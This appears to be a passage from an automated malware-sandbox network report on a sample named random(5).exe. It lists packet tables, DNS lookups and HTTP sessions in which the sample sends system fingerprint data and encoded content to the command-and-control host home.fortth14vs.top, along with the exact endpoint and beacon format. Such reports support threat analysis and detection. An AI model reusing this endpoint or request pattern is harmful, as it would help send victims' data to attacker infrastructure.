Jan 2, 2025 09:15:09.816575050 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816626072 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816634893 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816723108 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816730022 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816736937 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816741943 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:09.816746950 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816777945 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816787958 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816843033 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816853046 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816905975 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816916943 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816988945 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.816997051 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817051888 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817060947 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817075014 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817082882 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817167044 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817174911 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817179918 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817198992 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817246914 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817255020 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817365885 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817373991 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817411900 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817420006 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817462921 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817471981 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817536116 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817544937 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817548037 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817558050 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817569017 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817593098 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817601919 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817610979 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817627907 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817636967 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817665100 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817675114 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817711115 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.817720890 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821599007 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821608067 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821625948 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821635962 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821690083 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821698904 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821758032 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821768045 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821813107 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821821928 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821875095 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821883917 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821902037 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821911097 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821924925 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.821964979 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822092056 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822101116 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822103977 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822108030 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822128057 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822137117 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822189093 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822199106 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822216988 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822225094 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822274923 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822283983 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822309971 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822328091 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822393894 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822402954 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822449923 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822485924 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822501898 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822511911 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822570086 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822578907 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822633028 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:09.822643042 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:12.459002018 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:12.459366083 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:12.464494944 CET	80	49711	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:12.464576006 CET	49711	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:12.806647062 CET	49718	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:12.811566114 CET	80	49718	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:12.811686993 CET	49718	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:12.811916113 CET	49718	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:12.816752911 CET	80	49718	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:13.419538021 CET	80	49718	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:13.420104027 CET	49718	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:13.425082922 CET	80	49718	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:13.425384998 CET	49718	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:14.289203882 CET	49730	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:14.294045925 CET	80	49730	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:14.294116020 CET	49730	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:14.294465065 CET	49730	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:14.299257994 CET	80	49730	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:14.996077061 CET	80	49730	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:14.996550083 CET	49730	80	192.168.2.6	34.147.147.173
Jan 2, 2025 09:15:15.001912117 CET	80	49730	34.147.147.173	192.168.2.6
Jan 2, 2025 09:15:15.001979113 CET	49730	80	192.168.2.6	34.147.147.173

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 09:15:06.867830992 CET	63837	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:15:06.867892027 CET	63837	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:15:06.874754906 CET	53	63837	1.1.1.1	192.168.2.6
Jan 2, 2025 09:15:06.875184059 CET	53	63837	1.1.1.1	192.168.2.6
Jan 2, 2025 09:15:08.603240013 CET	63840	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:15:08.603332996 CET	63840	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:15:08.884521961 CET	53	63840	1.1.1.1	192.168.2.6
Jan 2, 2025 09:15:09.355252981 CET	53	63840	1.1.1.1	192.168.2.6
Jan 2, 2025 09:15:12.518076897 CET	52794	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:15:12.518140078 CET	52794	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:15:12.525157928 CET	53	52794	1.1.1.1	192.168.2.6
Jan 2, 2025 09:15:12.805670023 CET	53	52794	1.1.1.1	192.168.2.6
Jan 2, 2025 09:15:13.478763103 CET	52796	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:15:13.478825092 CET	52796	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:15:14.144407034 CET	53	52796	1.1.1.1	192.168.2.6
Jan 2, 2025 09:15:14.285022020 CET	53	52796	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 09:15:06.867830992 CET	192.168.2.6	1.1.1.1	0x228d	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:15:06.867892027 CET	192.168.2.6	1.1.1.1	0xa97e	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Jan 2, 2025 09:15:08.603240013 CET	192.168.2.6	1.1.1.1	0x5b23	Standard query (0)	home.fortth14vs.top	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:15:08.603332996 CET	192.168.2.6	1.1.1.1	0x9f6b	Standard query (0)	home.fortth14vs.top	28	IN (0x0001)	false
Jan 2, 2025 09:15:12.518076897 CET	192.168.2.6	1.1.1.1	0xebea	Standard query (0)	home.fortth14vs.top	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:15:12.518140078 CET	192.168.2.6	1.1.1.1	0x32b3	Standard query (0)	home.fortth14vs.top	28	IN (0x0001)	false
Jan 2, 2025 09:15:13.478763103 CET	192.168.2.6	1.1.1.1	0xb973	Standard query (0)	home.fortth14vs.top	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:15:13.478825092 CET	192.168.2.6	1.1.1.1	0x332a	Standard query (0)	home.fortth14vs.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 09:15:06.875184059 CET	1.1.1.1	192.168.2.6	0x228d	No error (0)	httpbin.org	34.200.57.114	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:15:06.875184059 CET	1.1.1.1	192.168.2.6	0x228d	No error (0)	httpbin.org	34.197.122.172	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:15:08.884521961 CET	1.1.1.1	192.168.2.6	0x5b23	No error (0)	home.fortth14vs.top	34.147.147.173	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:15:12.525157928 CET	1.1.1.1	192.168.2.6	0xebea	No error (0)	home.fortth14vs.top	34.147.147.173	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:15:14.144407034 CET	1.1.1.1	192.168.2.6	0xb973	No error (0)	home.fortth14vs.top	34.147.147.173	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.fortth14vs.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	34.147.147.173	80	5792	C:\Users\user\Desktop\random(5).exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:15:09.366978884 CET	12360	OUT	POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1 Host: home.fortth14vs.top Accept: / Content-Type: application/json Content-Length: 442005 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 36 37 36 30 34 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8452132140001676043", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", [TRUNCATED]
Jan 2, 2025 09:15:09.371915102 CET	4944	OUT	Data Raw: 7a 47 5c 2f 61 50 42 58 36 56 33 67 44 39 49 6a 4d 73 36 79 66 77 64 34 39 5c 2f 31 77 7a 48 68 33 41 34 66 4d 38 34 77 33 2b 71 5c 2f 47 6e 44 5c 2f 31 50 41 34 72 45 50 43 30 4b 5c 2f 74 65 4b 4f 48 63 6b 6f 59 6a 6e 72 70 30 5c 2f 5a 34 57 70 Data Ascii: zG\/aPBX6V3gD9IjMs6yfwd49\/1wzHh3A4fM84w3+q\/GnD\/1PA4rEPC0K\/teKOHckoYjnrp0\/Z4WpXqw+KdOMPePyDxe+jL43+A2X5PmvivwT\/qrgM+xtfLspxH+snCOefW8ZhqCxNej7PhvPs4rUOShJT58TTo0pfDCcppxODop7LjkdP5Uyv6IPwcKKKKDSn1+X6kLx8h\/f\/P6\/wCfRtWK\/UX\/AIJTf8E9\/wB
Jan 2, 2025 09:15:09.371953011 CET	4944	OUT	Data Raw: 61 53 56 75 49 5c 2f 4f 30 61 57 32 31 4c 77 79 6c 72 46 31 4e 74 70 4f 69 36 4e 4c 4c 6a 42 76 45 4a 4c 56 38 47 5c 2f 73 62 65 4f 74 4f 38 49 65 43 5c 2f 6a 4a 71 47 74 47 35 5c 2f 73 6e 77 74 42 6f 76 69 75 38 46 73 6b 63 6b 79 57 43 32 75 73 Data Ascii: aSVuI\/O0aW21LwylrF1NtpOi6NLLjBvEJLV8G\/sbeOtO8IeC\/jJqGtG5\/snwtBoviu8FskckyWC2usRapcRJLJBGzW0Gn28rxmcSzINltHLKNj+ceKPjd+0jLq\/wAQf2gvhd4\/07XvgJYzWltp\/h\/UvD0JTT7+3u9C02TwzqGhyxTa1pl7BaaifEF\/4gt9XtdO1O0mVkurW8ubbR7P+AOOvD\/Ns08VON45bi8Lk9O
Jan 2, 2025 09:15:09.371969938 CET	2472	OUT	Data Raw: 66 5c 2f 41 4b 33 30 39 65 58 32 66 6e 2b 48 5c 2f 42 4f 67 56 35 4e 73 6b 79 50 38 6a 2b 55 50 4e 38 7a 5c 2f 41 44 5c 2f 2b 76 6a 36 56 44 48 76 57 33 32 50 5c 2f 41 4d 73 7a 63 65 62 77 63 5c 2f 58 76 5c 2f 6e 38 71 75 62 73 71 36 66 36 6e 5c Data Ascii: f\/AK309eX2fn+H\/BOgV5NskyP8j+UPN8z\/AD\/+vj6VDHvW32P\/AMszcebwc\/Xv\/n8qubsq6f6n\/lr+7z\/+r\/PHpVOT93I6OLiB\/wDSIpfL59P\/AK1aGlPr8v1Dy3aR\/l3+XmXPr+uKrfPJ+7dPLf8A5ZeX\/L9OuKuN\/q9+zdD5v7o+V7j\/AD3\/AMIfL8zZN9zzP9XH\/qP9H+uecdqDfnfl\/XzK0nzSff
Jan 2, 2025 09:15:09.372107983 CET	9888	OUT	Data Raw: 7a 4f 77 7a 42 63 33 7a 71 72 53 70 63 4b 74 76 74 56 2b 6d 50 69 58 52 39 4b 54 77 33 72 63 63 57 6e 32 6c 75 72 57 56 37 4b 66 73 30 45 64 73 54 4c 49 6a 4e 4a 49 54 41 73 5a 5a 35 47 4a 5a 32 62 4a 64 69 53 32 53 61 5c 2f 50 79 66 51 55 77 57 Data Ascii: zOwzBc3zqrSpcKtvtV+mPiXR9KTw3rccWn2lurWV7Kfs0EdsTLIjNJITAsZZ5GJZ2bJdiS2Sa\/PyfQUwWt5ymMnbMMr\/AN\/FAKge6McdT6\/ydnvidkHFed4zNKGTrhehiZ0\/Z5fSf1nDUeShRoym8RShCU62InTlicVVlhqMZ161So1eUmf27kvhFxRwlkGAyuvnNPizE4SlONXMeT6jiK\/NWqVYxjhK1SpClQw8Jxw+G
Jan 2, 2025 09:15:09.376554966 CET	2472	OUT	Data Raw: 66 68 33 77 6c 34 67 38 4a 61 64 34 49 38 52 57 4e 5c 2f 34 56 38 53 2b 47 76 46 76 67 37 51 5c 2f 69 46 48 34 74 68 73 66 43 75 6c 65 44 64 56 38 51 2b 4a 66 43 47 6d 2b 49 61 47 69 58 50 77 5c 2f 38 52 2b 49 5c 2f 46 56 68 6f 76 37 51 76 37 50 Data Ascii: fh3wl4g8Jad4I8RWN\/4V8S+GvFvg7Q\/iFH4thsfCuleDdV8Q+JfCGm+IaGiXPw\/8R+I\/FVhov7Qv7PF94K8D\/B3U\/jX4u+K66l8f7fwfoHhrSfHngb4dXGlX3he7\/Zxt\/jOddn8QfEfwk2nSW3wpuPDGp2V9dvYeJbi70fWLOx\/mvxpwH0ePGXJcmy\/j7iWrCPD2JqcTZTmnD2Z5xlWc5DUdHMsqxixeIy7D1J4Gl
Jan 2, 2025 09:15:09.376769066 CET	4944	OUT	Data Raw: 2b 4a 5c 2f 77 41 4b 44 62 33 5c 2f 41 4f 37 2b 4a 54 71 46 5c 2f 76 48 38 50 35 43 72 72 41 74 2b 65 61 6a 32 48 32 5c 2f 7a 2b 46 42 76 54 71 66 72 5a 32 33 5c 2f 41 4b 5c 2f 72 7a 71 56 48 4c 39 38 5c 2f 35 37 6d 72 4f 50 76 39 38 5c 2f 7a 36 Data Ascii: +J\/wAKDb3\/AO7+JTqF\/vH8P5CrrAt+eaj2H2\/z+FBvTqfrZ23\/AK\/rzqVHL98\/57mrOPv98\/z6\/wBarf8ALT\/P92tvf\/u\/iWMk+79\/\/P5n\/H8OKh\/Pfn\/PtjH+cVPL3\/3f8ag7\/wB\/8+P5isToB+v4f1NV36\/hUtQSf98f5\/z7+9B0Fdg\/9z5P+mefX2\/D\/OaY2e\/qOn+v6dverCfdH4\/zNR
Jan 2, 2025 09:15:09.376801014 CET	4944	OUT	Data Raw: 37 34 6b 6a 78 76 6e 65 57 31 63 39 7a 6a 47 35 72 69 71 47 45 70 55 59 32 2b 76 63 4e 34 6e 68 61 64 42 56 6c 79 31 5a 77 77 2b 58 34 7a 45 59 6a 41 71 74 4b 74 44 42 5a 6c 4b 65 4b 77 30 4b 56 50 46 5a 68 68 38 5a 33 63 46 66 74 41 38 38 34 51 Data Ascii: 74kjxvneW1c9zjG5riqGEpUY2+vcN4nhadBVly1Zww+X4zEYjAqtKtDBZlKeKw0KVPFZhh8Z3cFftA884Q4J4Y4Lfh1w9m+G4XwOV4XBYrHV8RKdSrlOeYjiChUq0XKVFU8Tjq8aWPjQhQq4vBYbB4etWlLBYOth\/N\/Dvxk8R\/HL4qL491vxBdeL9S1P9mz9lay+JnizUNN17TNV1\/4\/+G\/gP8OfDXxuv9ZGv6Zptxq+s
Jan 2, 2025 09:15:09.376863003 CET	4944	OUT	Data Raw: 5c 2f 50 70 53 62 44 37 66 35 5c 2f 43 70 61 4b 44 51 69 32 48 32 5c 2f 7a 2b 46 4d 71 78 55 66 6c 2b 5c 2f 36 66 5c 2f 58 6f 41 6a 71 50 79 5c 2f 66 38 41 54 5c 2f 36 39 53 55 55 46 38 37 38 76 36 2b 5a 58 6f 71 54 79 5c 2f 66 38 41 54 5c 2f 36 Data Ascii: \/PpSbD7f5\/CpaKDQi2H2\/z+FMqxUfl+\/6f\/XoAjqPy\/f8AT\/69SUUF878v6+ZXoqTy\/f8AT\/69R0HX7\/8Ad\/Eay7vwqGrFRMu38\/yoKGVCy7fcVNRQBXop8in+AH8s\/wCSaZQdBXoqTH38\/wCf4v8ACjy\/f9P\/AK9AEdRydvxqSmv90\/h\/MUHQQ0VJ5fv+n\/16jrT2fn+H\/BAj8v3\/AE\/+vUdWKh2
Jan 2, 2025 09:15:09.419253111 CET	34608	OUT	Data Raw: 56 5c 2f 4c 6b 39 66 30 48 2b 4e 46 57 4b 6a 5c 2f 35 5a 5c 2f 35 5c 2f 76 56 66 4f 5c 2f 4c 2b 76 6d 64 42 42 68 50 62 38 5c 2f 77 44 36 39 4e 66 72 2b 48 39 54 55 74 52 79 64 76 78 5c 2f 70 52 7a 76 79 5c 2f 72 35 6d 6c 50 72 38 76 31 49 36 4b Data Ascii: V\/Lk9f0H+NFWKj\/5Z\/5\/vVfO\/L+vmdBBhPb8\/wD69Nfr+H9TUtRydvx\/pRzvy\/r5mlPr8v1I6KKKg0Cq9WKjk7fj\/SgCOiiiug6CPnZ+P6Z\/nn9KjqZ\/un8P5ioaAI5O34\/0quy9x+P+NXKY\/T8f6Gg6Cnsf2\/L\/AOypoXb6\/jVmo5O34\/0rSn1+X6mlPr8v1Idi+n8\/8aZIuefXg\/Xt\/n2qWitDQr0
Jan 2, 2025 09:15:09.467178106 CET	1236	OUT	Data Raw: 6f 79 6a 67 6a 68 36 72 34 30 30 63 74 72 35 4c 56 77 4f 42 34 54 6e 55 78 75 59 55 70 79 7a 62 41 63 45 34 7a 49 56 4c 4c 63 4e 57 78 72 6c 48 47 51 70 5c 2f 77 42 6f 35 37 53 70 5a 4e 50 4c 38 61 71 48 39 6f 55 73 77 78 4f 62 4e 50 4d 61 50 37 Data Ascii: oyjgjh6r400ctr5LVwOB4TnUxuYUpyzbAcE4zIVLLcNWxrlHGQp\/wBo57SpZNPL8aqH9oUswxObNPMaP7JhfpieBeb1+O86ofR4xOcUs3hLMuNsXDK8kr+1ybEcS4nMKkM\/r0cp9jPCYjGZhk2Vqtm0MZl6q5Zlc8NgsHiKsqVT6f8AEmu+Gm\/Zt+DvizwH8G\/2nPFb+NPgh+zb8UYv2tdE+B3i3U\/2bdV8a\/EWDQX+Lv
Jan 2, 2025 09:15:12.459002018 CET	138	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Thu, 02 Jan 2025 08:15:12 GMT content-type: text/html; charset=utf-8 content-length: 1 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49718	34.147.147.173	80	5792	C:\Users\user\Desktop\random(5).exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:15:12.811916113 CET	99	OUT	GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1 Host: home.fortth14vs.top Accept: /
Jan 2, 2025 09:15:13.419538021 CET	353	IN	HTTP/1.1 404 NOT FOUND server: nginx/1.22.1 date: Thu, 02 Jan 2025 08:15:13 GMT content-type: text/html; charset=utf-8 content-length: 207 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49730	34.147.147.173	80	5792	C:\Users\user\Desktop\random(5).exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:15:14.294465065 CET	172	OUT	POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1 Host: home.fortth14vs.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Jan 2, 2025 09:15:14.996077061 CET	353	IN	HTTP/1.1 404 NOT FOUND server: nginx/1.22.1 date: Thu, 02 Jan 2025 08:15:14 GMT content-type: text/html; charset=utf-8 content-length: 207 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	34.200.57.114	443	5792	C:\Users\user\Desktop\random(5).exe

